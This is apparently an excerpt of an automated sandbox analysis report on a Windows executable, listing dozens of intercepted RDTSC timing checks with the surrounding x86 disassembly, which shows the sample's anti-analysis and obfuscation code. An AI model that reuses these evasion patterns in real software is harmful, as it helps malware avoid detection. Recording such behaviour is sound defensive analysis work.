                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F32B1 second address: 5F32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F5653 second address: 5F5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F5660 second address: 5F5664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F6AA8 second address: 5F6AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F79C6 second address: 5F7A19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FC218F099B6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f jmp 00007FC218F099C8h 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 nop 0x00000017 and ebx, dword ptr [ebp+136324B9h] 0x0000001d push 00000000h 0x0000001f jmp 00007FC218F099C3h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+13632363h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F7A19 second address: 5F7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F5CC1 second address: 5F5CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F88BF second address: 5F88C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F88C5 second address: 5F88D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F88D8 second address: 5F8955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+13633D4Eh], ebx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FC2192E8588h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c adc bh, FFFFFFD7h 0x0000002f mov edi, dword ptr [ebp+1363335Ch] 0x00000035 push edx 0x00000036 or dword ptr [ebp+137B0FBAh], ebx 0x0000003c pop ebx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FC2192E8588h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 jnc 00007FC2192E8587h 0x0000005f xchg eax, esi 0x00000060 jl 00007FC2192E8590h 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F990F second address: 5F9930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC218F099BCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F9930 second address: 5F9934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F9934 second address: 5F99B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FC218F099B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 je 00007FC218F099C1h 0x0000002e jno 00007FC218F099BBh 0x00000034 push 00000000h 0x00000036 call 00007FC218F099C2h 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e mov edi, dword ptr [ebp+1363217Fh] 0x00000044 push eax 0x00000045 pushad 0x00000046 push edi 0x00000047 jl 00007FC218F099B6h 0x0000004d pop edi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC218F099C2h 0x00000055 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FCEAB second address: 5FCEB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F7B59 second address: 5F7B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F9BEF second address: 5F9BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F7B5E second address: 5F7B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007FC218F099CDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC218F099BBh 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F7B8C second address: 5F7B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEDE4 second address: 5FEDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEDE9 second address: 5FEDFE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2192E858Ch 0x00000008 je 00007FC2192E8586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F9BF3 second address: 5F9BFD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FAB76 second address: 5FAB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8595h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007FC2192E8588h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FAB9E second address: 5FABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 600CA9 second address: 600D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 call 00007FC2192E8598h 0x0000000d xor ebx, dword ptr [ebp+136324B9h] 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FC2192E8588h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+136338C5h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FC2192E8588h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 or dword ptr [ebp+136338CAh], ecx 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FDF37 second address: 5FDF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FD056 second address: 5FD0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC2192E8588h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+136332D1h] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 sub edi, 5C04957Dh 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FC2192E8588h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 push ebx 0x00000059 push edx 0x0000005a adc di, 5DCFh 0x0000005f pop edi 0x00000060 pop ebx 0x00000061 mov eax, dword ptr [ebp+13630909h] 0x00000067 movzx ebx, cx 0x0000006a push FFFFFFFFh 0x0000006c mov di, 5A9Eh 0x00000070 mov dword ptr [ebp+137B0A6Ah], eax 0x00000076 push eax 0x00000077 pushad 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 600D22 second address: 600D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FDF3B second address: 5FDF41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 600D26 second address: 600D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FDF41 second address: 5FDF4B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2192E858Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 600D42 second address: 600D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FDF4B second address: 5FDF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FDF58 second address: 5FDF62 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 602C89 second address: 602D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC2192E8586h 0x00000009 jmp 00007FC2192E8598h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 and edi, dword ptr [ebp+13631D58h] 0x00000018 and ebx, dword ptr [ebp+13632F41h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+13633140h], esi 0x00000026 xor ebx, dword ptr [ebp+137D4D0Ah] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FC2192E8588h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 jmp 00007FC2192E8596h 0x0000004d xchg eax, esi 0x0000004e js 00007FC2192E8596h 0x00000054 pushad 0x00000055 jmp 00007FC2192E858Ch 0x0000005a push esi 0x0000005b pop esi 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007FC2192E858Fh 0x00000066 ja 00007FC2192E8586h 0x0000006c popad 0x0000006d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 603B83 second address: 603C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movzx edi, si 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC218F099B8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FC218F099B8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 jmp 00007FC218F099C8h 0x0000004c push eax 0x0000004d jc 00007FC218F099BEh 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 604C35 second address: 604C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 jo 00007FC2192E8586h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jbe 00007FC2192E8586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FFD3B second address: 5FFD45 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC218F099BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 601EC9 second address: 601ED3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 602E95 second address: 602E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 605C14 second address: 605C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 601ED3 second address: 601ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 602E9C second address: 602EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 605C18 second address: 605C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 602EA2 second address: 602EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEEF3 second address: 5FEEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEEF7 second address: 5FEF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 604E96 second address: 604EA0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEF05 second address: 5FEF0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 604EA0 second address: 604EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5FEF0B second address: 5FEF12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 604EA6 second address: 604EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 603DC5 second address: 603DD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 605ECB second address: 605ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 60D4F6 second address: 60D501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC2192E8586h 0x0000000a pop ebx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 60D501 second address: 60D509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 60D509 second address: 60D50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 60D50D second address: 60D547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC218F099C9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 610F35 second address: 610F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 610F3F second address: 610F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007FC218F099B6h 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 610F4C second address: 610F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FC2192E8586h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 610F58 second address: 610F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61362D second address: 613638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2192E8586h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619214 second address: 619218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619A92 second address: 619A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619A96 second address: 619A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619A9C second address: 619AA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619AA1 second address: 619AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619AA7 second address: 619AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619AB0 second address: 619AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC218F099B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619AC4 second address: 619ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619ACA second address: 619ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619ACE second address: 619AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC2192E858Dh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619AF3 second address: 619AF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619C53 second address: 619C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 619DEB second address: 619E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C4h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A083 second address: 61A0B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC2192E8586h 0x00000009 je 00007FC2192E8586h 0x0000000f js 00007FC2192E8586h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC2192E8595h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A1BC second address: 61A1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
